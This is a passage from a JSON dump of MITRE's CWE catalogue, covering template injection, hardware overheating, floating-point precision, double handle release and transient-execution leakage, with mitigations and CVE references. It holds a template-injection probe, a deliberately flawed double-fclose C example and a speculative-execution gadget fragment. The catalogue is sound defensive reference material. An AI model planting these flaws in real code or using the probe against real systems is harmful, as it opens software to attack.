incorrectly sized shift value resulting in an overshift.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4206"},{"Reference":"CVE-2018-20788","Description":"LED driver overshifts under certain conditions resulting in a DoS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20788"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-03-29"}}},"1336":{"attr":{"@_ID":"1336","@_Name":"Improper Neutralization of Special Elements Used in a Template Engine","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a template engine to insert or process externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements or syntax that can be interpreted as template expressions or other code directives when processed by the engine.","Extended_Description":{"xhtml:p":["Many web applications use template engines that allow developers to insert externally-influenced values into free text or messages in order to generate a full web page, document, message, etc. Such engines include Twig, Jinja2, Pug, Java Server Pages, FreeMarker, Velocity, ColdFusion, Smarty, and many others - including PHP itself. Some CMS (Content Management Systems) also use templates.","Template engines often have their own custom command or expression language. If an attacker can influence input into a template before it is processed, then the attacker can invoke arbitrary expressions, i.e. perform injection attacks. For example, in some template languages, an attacker could inject the expression \\"{{7*7}}\\" and determine if the output returns \\"49\\" instead. The syntax varies depending on the language.","In some cases, XSS-style attacks can work, which can obscure the root cause if the developer does not closely investigate the root cause of the error.","Template engines can be used on the server or client, so both \\"sides\\" could be affected by injection. The mechanisms of attack or the affected technologies might be different, but the mistake is fundamentally the same."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"94","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Python","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Interpreted","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Client Server","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Server-Side Template Injection / SSTI","Description":"This term is used for injection into template engines being used by a server."},{"Term":"Client-Side Template Injection / CSTI","Description":"This term is used for injection into template engines being used by a client."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The developer might choose a template engine that makes it easier for programmers to write vulnerable code."},{"Phase":"Implementation","Note":"The programmer might not use engine\'s built-in sandboxes or other capabilities to escape or otherwise prevent template injection from untrusted input."}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Choose a template engine that offers a sandbox or restricted mode, or at least limits the power of any available expressions, function calls, or commands."},{"Phase":"Implementation","Description":"Use the template engine\'s sandbox or restricted mode, if available."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-16783","Description":"server-side template injection in content management server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16783"},{"Reference":"CVE-2020-9437","Description":"authentication / identity management product has client-side template injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9437"},{"Reference":"CVE-2020-12790","Description":"Server-Side Template Injection using a Twig template","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12790"},{"Reference":"CVE-2021-21244","Description":"devops platform allows SSTI","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21244"},{"Reference":"CVE-2020-4027","Description":"bypass of Server-Side Template Injection protection mechanism with macros in Velocity templates","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4027"},{"Reference":"CVE-2020-26282","Description":"web browser proxy server allows Java EL expressions from Server-Side Template Injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26282"},{"Reference":"CVE-2020-1961","Description":"SSTI involving mail templates and JEXL expressions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1961"},{"Reference":"CVE-2019-19999","Description":"product does not use a \\"safe\\" setting for a FreeMarker configuration, allowing SSTI","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19999"},{"Reference":"CVE-2018-20465","Description":"product allows read of sensitive database username/password variables using server-side template injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20465"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1193"}},{"attr":{"@_External_Reference_ID":"REF-1194"}}]},"Notes":{"Note":{"#text":"Since expression languages are often used in templating languages, there may be some overlap with CWE-917 (Expression Language Injection). XSS (CWE-79) is also co-located with template injection.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-07-19"}}},"1338":{"attr":{"@_ID":"1338","@_Name":"Improper Protections Against Hardware Overheating","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A hardware device is missing or has inadequate protection features to prevent overheating.","Extended_Description":{"xhtml:p":["Hardware, electrical circuits, and semiconductor silicon have thermal side effects, such that some of the energy consumed by the device gets dissipated as heat and increases the temperature of the device. For example, in semiconductors, higher-operating frequency of silicon results in higher power dissipation and heat. The leakage current in CMOS circuits increases with temperature, and this creates positive feedback that can result in thermal runaway and damage the device permanently.","Any device lacking protections such as thermal sensors, adequate platform cooling or thermal insulation is susceptible to attacks by malicious software that might deliberately operate the device in modes that result in overheating. This can be used as an effective denial of service (DoS) or permanent denial of service (PDoS) attack.","Depending on the type of hardware device and its expected usage, such thermal overheating can also cause safety hazards and reliability issues. Note that battery failures can also cause device overheating but the mitigations and examples included in this submission cannot reliably protect against a battery failure.","There can be similar weaknesses with lack of protection from attacks based on overvoltage or overcurrent conditions. However, thermal heat is generated by hardware operation and the device should implement protection from overheating."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware architecture, design or implementation."}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Likelihood":"High"}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"Dynamic tests should be performed to stress-test temperature controls.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Power management controls should be part of Architecture and Design reviews.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Temperature maximum and minimum limits should be enforced using thermal sensors both in silicon and at the platform level."},{"Phase":"Implementation","Description":"The platform should support cooling solutions such as fans that can be modulated based on device-operation needs to maintain a stable temperature."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Malicious software running on a core can execute instructions that consume maximum power or increase core frequency. Such a power-virus program could execute on the platform for an extended time to overheat the device, resulting in permanent damage.","Body_Text":["Execution core and platform do not support thermal sensors, performance throttling, or platform-cooling countermeasures to ensure that any software executing on the system cannot cause overheating past the maximum allowable temperature.","The platform and SoC should have failsafe thermal limits that are enforced by thermal sensors that trigger critical temperature alerts when high temperature is detected. Upon detection of high temperatures, the platform should trigger cooling or shutdown automatically."]}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1156"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-29"}}},"1339":{"attr":{"@_ID":"1339","@_Name":"Insufficient Precision or Accuracy of a Real Number","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program processes a real number with an implementation in which the number\u2019s representation does not preserve required accuracy and precision in its fractional part, causing an incorrect result.","Extended_Description":{"xhtml:p":["When a security decision or calculation requires highly precise, accurate numbers \u2013 such as financial calculations or prices \u2013 then small variations in the number could be exploited by an attacker.","There are multiple ways to store the fractional part of a real number in a computer. In all of these cases, there is a limit to the accuracy of recording a fraction. If the fraction can be represented in a fixed number of digits (binary or decimal), there might not be enough digits assigned to represent the number. In other cases the number cannot be represented in a fixed number of digits due to repeating in decimal or binary notation (e.g. 0.333333...) or due to a transcendental number such as \u03a0  or \u221a2. Rounding of numbers can lead to situations where the computer results do not adequately match the result of sufficiently accurate math."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"190","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"834","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"#text":"There are three major ways to store real numbers in computers. Each method is described along with the limitations of how they store their numbers.","xhtml:ol":{"xhtml:li":["Fixed: Some implementations use a fixed number of binary bits to represent both the integer and the fraction.  In the demonstrative example about Muller\'s Recurrence, the fraction 108.0 - ((815.0 - 1500.0 / z) / y) cannot be represented in 8 binary digits. The numeric accuracy within languages such as PL/1, COBOL and Ada is expressed in decimal digits rather than binary digits. In SQL and most databases, the length of the integer and the fraction are specified by the programmer in decimal. In the language C, fixed reals are implemented according to ISO/IEC TR18037","Floating: The number is stored in a version of scientific notation with a fixed length for the base and the significand. This allows flexibility for more accuracy when the integer portion is smaller. When dealing with large integers, the fractional accuracy is less. Languages such as PL/1, COBOL and Ada set the accuracy by decimal digit representation rather than using binary digits. Python also implements decimal floating-point numbers using the IEEE 754-2008 encoding method.","Ratio: The number is stored as the ratio of two integers. These integers also have their limits. These integers can be stored in a fixed number of bits or in a vector of digits. While the vector of digits method provides for very large integers, they cannot truly represent a repeating or transcendental number as those numbers do not ever have a fixed length."]}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This weakness is introduced when the developer picks a method to represent a real number. The weakness may only be visible with very specific numeric inputs."}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"This weakness will generally lead to undefined results and therefore crashes. In some implementations the program will halt if the weakness causes an overflow during a calculation."},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands","Note":"The results of the math are not as expected. This could cause issues where a value would not be properly calculated and provide an incorrect answer."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Read Application Data","Modify Application Data"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","Patching and Maintenance"],"Description":"The developer or maintainer can move to a more accurate representation of real numbers.  In extreme cases, the programmer can move to representations such as ratios of BigInts which can represent real numbers to extremely fine precision. The programmer can also use the concept of an Unum real. The memory and CPU tradeoffs of this change must be examined. Since floating point reals are used in many programs and many locations, they are implemented in hardware and most format changes will cause the calculations to be moved into software resulting in slower programs."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Muller\'s Recurrence is a series that is supposed to converge to the number 5. When running this series with the following code, different implementations of real numbers fail at specific iterations:","Example_Code":[{"#text":"fn rec_float(y: f64, z: f64) -&gt; f64{108.0 - ((815.0 - 1500.0 / z) / y);}fn float_calc(turns: usize) -&gt; f64{let mut x: Vec&lt;f64&gt; = vec![4.0, 4.25];(2..turns + 1).for_each(|number|{x.push(rec_float(x[number - 1], x[number - 2]));});x[turns]}","attr":{"@_Nature":"bad","@_Language":"Rust"},"xhtml:br":["","","","","","","","","","","","","","",""]},{"#text":"Use num_rational::BigRational;fn rec_big(y: BigRational, z: BigRational) -&gt; BigRational{BigRational::from_integer(BigInt::from(108))- ((BigRational::from_integer(BigInt::from(815))- BigRational::from_integer(BigInt::from(1500)) / z)/ y)}fn big_calc(turns: usize) -&gt; BigRational{let mut x: Vec&lt;BigRational&gt; = vec![BigRational::from_float(4.0).unwrap(), BigRational::from_float(4.25).unwrap(),];(2..turns + 1).for_each(|number|{x.push(rec_big(x[number - 1].clone(), x[number - 2].clone()));});x[turns].clone()}","attr":{"@_Nature":"good","@_Language":"Rust"},"xhtml:br":["","","","","","","","","","","","","","","","","","","",""]}],"Body_Text":{"#text":"The chart below shows values for different data structures in the rust language when Muller\u2019s recurrence is executed to 80 iterations. The data structure f64 is a 64 bit float. The data structures I&lt;number&gt;F&lt;number&gt; are fixed representations 128 bits in length that use the first number as the size of the integer and the second size as the size of the fraction (e.g. I16F112 uses 16 bits for the integer and 112 bits for the fraction). The data structure of Ratio comes in three different implementations: i32 uses a ratio of 32 bit signed  integers,  i64 uses a ratio of 64 bit signed integers and BigInt uses a ratio of signed integer with up to 2^32 digits of base 256.  Notice how even with 112 bits of fractions or ratios of 64bit unsigned integers, this math still does not converge to an expected value of 5.","xhtml:img":{"attr":{"@_src":"https://cwe.mitre.org/data/images/Mullers-Recurrence-CWE-1339.png","@_alt":"Muller\'s Recurrence"}}}},{"Intro_Text":"On February 25, 1991, during the eve of the of an Iraqi invasion of Saudi Arabia, a Scud missile fired from Iraqi positions hit a US Army barracks in Dhahran, Saudi Arabia. It miscalculated time and killed 28 people [REF-1190].","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1190"}}}},{"Intro_Text":"Sleipner A, an offshore drilling platform in the North Sea was incorrectly constructed with an underestimate of 50% of strength in a critical cluster of buoyancy cells needed for construction. This led to a leak in buoyancy cells during lowering, causing a seismic event of 3.0 on the Richter Scale and about $700M loss [REF-1190].","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1190"}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-16069","Description":"Chain: series of floating-point precision errors\\n\\t\\t\\t(CWE-1339) in a web browser rendering engine causes out-of-bounds read\\n\\t\\t\\t(CWE-125), giving access to cross-origin data","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16069"},{"Reference":"CVE-2017-7619","Description":"Chain: rounding error in floating-point calculations\\n\\t\\t\\t(CWE-1339) in image processor leads to infinite loop (CWE-835)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7619"},{"Reference":"CVE-2021-29529","Description":"Chain: machine-learning product can have a heap-based\\n\\t\\t\\tbuffer overflow (CWE-122) when some integer-oriented bounds are\\n\\t\\t\\tcalculated by using ceiling() and floor() on floating point values\\n\\t\\t\\t(CWE-1339)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29529"},{"Reference":"CVE-2008-2108","Description":"Chain: insufficient precision (CWE-1339) in\\n\\t\\t\\trandom-number generator causes some zero bits to be reliably\\n\\t\\t\\tgenerated, reducing the amount of entropy (CWE-331)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108"},{"Reference":"CVE-2006-6499","Description":"Chain: web browser crashes due to infinite loop - \\"bad\\n\\t\\t\\tlooping logic [that relies on] floating point math [CWE-1339] to exit\\n\\t\\t\\tthe loop [CWE-835]\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6499"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1186"}},{"attr":{"@_External_Reference_ID":"REF-1187"}},{"attr":{"@_External_Reference_ID":"REF-1188"}},{"attr":{"@_External_Reference_ID":"REF-1189"}},{"attr":{"@_External_Reference_ID":"REF-1190"}},{"attr":{"@_External_Reference_ID":"REF-1191"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-07-08"}}},"1341":{"attr":{"@_ID":"1341","@_Name":"Multiple Releases of Same Resource or Handle","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product attempts to close or release a resource or handle more than once, without an intervening successful open.","Extended_Description":{"xhtml:p":["Code typically requires \\"opening\\" handles or references to resources such as memory, files, devices, connections, services, etc. When the code is finished with using the resource, it is typically expected to \\"close\\" or \\"release\\" the resource, which indicates to the environment (such as the OS) that the resource can be re-assigned or reused by unrelated processes or actors. APIs or other abstractions are often used to perform this release, such as free() or delete() within C/C++, or file-handle close() operations that are used in many languages.","Unfortunately, the implementation or design of such APIs might expect the developer to be responsible for ensuring that such APIs are only called once per release of the resource. if the developer attempts to release the same resource/handle more than onc, then the API\'s expectations are not met, resulting in undefined and/or insecure behavior. This could lead to consequences such as memory corruption, data corruption, execution path corruption, or other consequences.","Note that while the implementation for most (if not all) resource reservation allocations involve a unique identifier/pointer/symbolic reference, then if this identifier is reused, checking the identifier for resource closure may result in a false state of openness and closing of the wrong resource. For this reason, reuse of identifiers is discouraged."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"672","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Rust","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":"DoS: Crash, Exit, or Restart","Likelihood":"Medium"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"For commonly-used APIs and resource types, automated tools often have signatures that can spot this issue."},{"Method":"Automated Dynamic Analysis","Description":"Some compiler instrumentation tools such as AddressSanitizer (ASan) can indirectly detect some instances of this weakness."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When closing a resource, set the associated variable to NULL or equivalent value for the given language. Some APIs will ignore this null value or lead to application crashes or exceptions, which may be preferable to data/memory corruption."},{"Phase":"Implementation","Description":"Implementing a flag that is set when the resource is opened and cleared when it is closed and checked before closing can be effective at prevention."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example attempts to close the file twice. In some cases, the C library fclose() function will catch the error and return an error code. In other implementations, a double-free (CWE-415) occurs causing the program to fault. Note that the examples presented here are simplistic, and double fclose() calls will frequently be spread around a program, making them more difficult to find during code reviews.","Example_Code":[{"#text":"char b[2000];FILE *f = fopen(\\"dbl_cls.c\\", \\"r\\");if (f){}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"b[0] = 0;fread(b, 1, sizeof(b) - 1, f);printf(\\"%s\\\\n\'\\", b);int r1 = fclose(f);printf(\\"\\\\n-----------------\\\\n1 close done \'%d\'\\\\n\\", r1);int r2 = fclose(f);\\t// Double closeprintf(\\"2 close done \'%d\'\\\\n\\", r2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","",""]}},{"#text":"char b[2000];FILE *f = fopen(\\"dbl_cls.c\\", \\"r\\");if (f){}","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","",""],"xhtml:div":{"#text":"b[0] = 0;fread(b, 1, sizeof(b) - 1, f);printf(\\"%s\\\\n\'\\", b);int r1 = fclose(f);printf(\\"\\\\n-----------------\\\\n1 close done \'%d\'\\\\n\\", r1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}},{"#text":"char b[2000];int f_flg = 0;FILE *f = fopen(\\"dbl_cls.c\\", \\"r\\");if (f){}","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":{"#text":"f_flg = 1;b[0] = 0;fread(b, 1, sizeof(b) - 1, f);printf(\\"%s\\\\n\'\\", b);if (f_flg){}if (f_flg){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","",""],"xhtml:div":[{"#text":"int r1 = fclose(f);f_flg = 0;printf(\\"\\\\n-----------------\\\\n1 close done \'%d\'\\\\n\\", r1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"int r2 = fclose(f);\\t// Double closef_flg = 0;printf(\\"2 close done \'%d\'\\\\n\\", r2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}}],"Body_Text":[{"#text":"This example only has one call to fclose(). While this is certainly the preferred handling of this problem, this simplistic method is not always possible.","xhtml:br":""},{"#text":"This example uses a flag to call fclose() only once. Note that this flag is explicit. The variable \\"f\\" could also have been used as it will be either NULL if the file is not able to be opened or a valid pointer if the file was successfully opened. If \\"f\\" is replacing \\"f_flg\\" then \\"f\\" would need to be set to NULL after the first fclose() call so the second fclose call would never be executed.","xhtml:br":""}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-13351","Description":"file descriptor double close can cause the wrong file to be associated with a file descriptor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13351"},{"Reference":"CVE-2006-5051","Description":"Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free (CWE-415).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051"},{"Reference":"CVE-2004-0772","Description":"Double free resultant from certain error conditions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0772"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1198"}},{"attr":{"@_External_Reference_ID":"REF-1199"}},{"attr":{"@_External_Reference_ID":"REF-1200"}},{"attr":{"@_External_Reference_ID":"REF-1201"}}]},"Notes":{"Note":{"#text":"The terms related to \\"release\\"  may vary depending on the type of resource, programming language, specification, or framework. \\"Close\\" has been used synonymously for the release of resources like file descriptors and file handles. \\"Return\\" is sometimes used instead of Release. \\"Free\\" is typically used when releasing memory or buffers back into the system for reuse.","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-09-07"}}},"1342":{"attr":{"@_ID":"1342","@_Name":"Information Exposure through Microarchitectural State after Transient Execution","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The processor does not properly clear microarchitectural state after incorrect microcode assists or speculative execution, resulting in transient execution.","Extended_Description":{"xhtml:p":["In many processor architectures an exception, mis-speculation, or microcode assist results in a flush operation to clear results that are no longer required. This action prevents these results from influencing architectural state that is intended to be visible from software. However, traces of this transient execution may remain in microarchitectural buffers, resulting in a change in microarchitectural state that can expose sensitive information to an attacker using side-channel analysis. For example, Load Value Injection (LVI) [REF-1202] can exploit direct injection of erroneous values into intermediate load and store buffers.","Several conditions may need to be fulfilled for a successful attack:"],"xhtml:ul":{"xhtml:li":["1) incorrect transient execution that results in remanence of sensitive information;","2) attacker has the ability to provoke microarchitectural exceptions;","3) operations and structures in victim code that can be exploited must be identified."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":[{"attr":{"@_Class":"Workstation","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"x86","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"ARM","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}}],"Technology":[{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Requirements"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands"],"Likelihood":"Medium"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Requirements"],"Description":"Hardware ensures that no illegal data flows from faulting micro-ops exists at the microarchitectural level.","Effectiveness":"High","Effectiveness_Notes":"Being implemented in silicon it is expected to fully address the known weaknesses with limited performance impact."},{"Phase":"Build and Compilation","Description":"Include instructions that explicitly remove traces of unneeded computations from software interactions with microarchitectural elements e.g. lfence, sfence, mfence, clflush.","Effectiveness":"High","Effectiveness_Notes":"This effectively forces the processor to complete each memory access before moving on to the next operation. This may have a large performance impact."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Faulting loads in a victim domain may trigger incorrect transient forwarding, which leaves secret-dependent traces in the microarchitectural state. Consider this example from [REF-1203].","Body_Text":["Consider the code gadget:",{"xhtml:p":["A processor with this weakness will store the value of untrusted_arg (which may be provided by an attacker) to the stack, which is trusted memory. Additionally, this store operation will save this value in some microarchitectural buffer, e.g. the store queue.","In this code gadget, \\n\\t\\t\\t\\t\\ttrusted_ptr is dereferenced while the attacker forces a page fault. The faulting load causes the processor to mis-speculate by forwarding untrusted_arg as the (speculative) load result. The processor then uses untrusted_arg for the pointer dereference. After the fault has been handled and the load has been re-issued with the correct argument, secret-dependent information stored at the address of trusted_ptr remains in microarchitectural state and can be extracted by an attacker using a code gadget."]}],"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"void call_victim(size_t untrusted_arg) {}","xhtml:br":"","xhtml:div":{"#text":"*arg_copy = untrusted_arg;array[**trusted_ptr * 4096];","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2020-0551","Description":"Load value injection in some processors utilizing speculative execution may allow an authenticated user to enable information disclosure via a side-channel with local access.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0551"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1202"}},{"attr":{"@_External_Reference_ID":"REF-1203"}},{"attr":{"@_External_Reference_ID":"REF-1204"}},{"attr":{"@_External_Reference_ID":"REF-1205"}}]},"Notes":{"Note":{"#text":"CWE-1342 differs from CWE-1303, which is related to misprediction and biasing microarchitectural components, while CWE-1342 addresses illegal data flows and retention. For example, Spectre is an instance of CWE-1303 biasing branch prediction to steer the transient execution indirectly.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Anders Nordstrom, Alric Althoff","Submission_Organization":"Tortuga Logic","Submission_Date":"2021-09-22"}}},"1351":{"attr":{"@_ID":"1351","@_Name":"Improper Handling of Hardware Behavior in Exceptionally Cold Environments","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A hardware device, or the firmware running on it, is\\n                missing or has incorrect protection features to maintain\\n                goals of security primitives when the device is cooled below\\n                standard operating temperatures.","Extended_Description":{"xhtml:p":["The hardware designer may improperly anticipate\\n                    hardware behavior when exposed to exceptionally cold\\n                    conditions. As a result they may introduce a weakness by not\\n                    accounting for the modified behavior of critical components\\n                    when in extreme environments.","An example of a change in behavior is that power loss\\n                    won\'t clear/reset any volatile state when cooled below\\n                    standard operating temperatures. This may result in\\n                    a weakness when the starting state of the volatile memory is\\n                    being relied upon for a security decision. For example, a\\n                    Physical Unclonable Function (PUF) may be supplied as a\\n                    security primitive to improve confidentiality,\\n                    authenticity, and integrity guarantees. However, when the\\n                    PUF is paired with DRAM, SRAM, or another temperature\\n                    sensitive entropy source, the system designer may introduce\\n                    weakness by failing to account for the chosen entropy\\n                    source\'s behavior at exceptionally low temperatures. In the\\n                    case of DRAM and SRAM, when power is cycled at low\\n                    temperatures, the device will not contain the bitwise\\n                    biasing caused by inconsistencies in manufacturing and will\\n                    instead contain the data from previous boot. Should the PUF\\n                    primitive be used in a cryptographic construction which\\n                    does not account for full adversary control of PUF seed\\n                    data, weakness would arise.","This weakness does not cover \\"Cold Boot Attacks\\"\\n                    wherein RAM or other external storage is super cooled and\\n                    read externally by an 